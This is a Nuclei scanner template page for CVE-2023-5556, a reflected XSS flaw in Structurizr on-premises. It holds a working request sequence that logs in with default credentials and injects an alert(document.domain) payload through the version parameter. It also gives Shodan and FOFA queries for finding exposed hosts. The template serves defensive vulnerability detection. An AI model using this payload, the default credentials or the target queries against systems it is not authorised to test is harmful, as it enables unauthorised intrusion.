Skip to content
Nuclei Templates

Structurizr on-premises - Cross Site Scripting

ID: CVE-2023-5556

Severity: medium

Author: shankaracharya

Tags: cve,cve2023,xss,structurizr,oos,authenticated

Description

Section titled “Description”

Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.

YAML Source

Section titled “YAML Source”
id: CVE-2023-5556


info:
  name: Structurizr on-premises - Cross Site Scripting
  author: shankaracharya
  severity: medium
  description: |
    Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.
  remediation: |
    Apply the latest security patches or updates provided by Structurizr to fix the XSS vulnerability.
  reference:
    - https://huntr.com/bounties/a3ee0f98-6898-41ae-b1bd-242a03a73d1b/
    - https://github.com/structurizr/onpremises/commit/6cff4f792b010dfb1ff6a0b4ae1c6e398f8f8a18
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-5556
    cwe-id: CWE-79
    epss-score: 0.00064
    epss-percentile: 0.27592
    cpe: cpe:2.3:a:structurizr:on-premises_installation:*:*:*:*:*:*:*:*
  metadata:
    max-request: 5
    vendor: structurizr
    product: on-premises_installation
    shodan-query: http.favicon.hash:1199592666
    fofa-query: icon_hash=1199592666
  tags: cve,cve2023,xss,structurizr,oos,authenticated
variables:
  str: "{{randstr}}"


http:
  - raw:
      - |
        GET /signin HTTP/1.1
        Host: {{Hostname}}


      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded


        username={{username}}&password={{password}}&_csrf={{csrf}}&hash=


      - |
        GET /dashboard HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


      - |
        GET /workspace/create HTTP/1.1
        Host: {{Hostname}}


      - |
        GET /workspace/{{workspace}}/?version={{str}}%22);alert(document.domain);// HTTP/1.1
        Host: {{Hostname}}


    attack: pitchfork
    payloads:
      username:
        - "structurizr"
      password:
        - "password"


    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - '<a href="/dashboard">'
          - 'Sign out'
        condition: and


      - type: word
        part: body_5
        words:
          - '");alert(document.domain);//'
          - 'Structurizr'
        condition: and


      - type: status
        status:
          - 200


    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'name="_csrf" value="([0-9a-z-]+)"'
        internal: true


      - type: regex
        name: workspace
        group: 1
        part: header
        regex:
          - '\/workspace\/([0-9]+)\?scriptNonce='
        internal: true
# digest: 4b0a00483046022100e56216798faa38a6ac08f468f70bf96020d260653d6243d724cb7a448097ea300221008a65a466f8beb0bd149214ce898bbeeca1fc9022b23892a0f018cf0750ec0e57:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-5556.yaml"

View on Github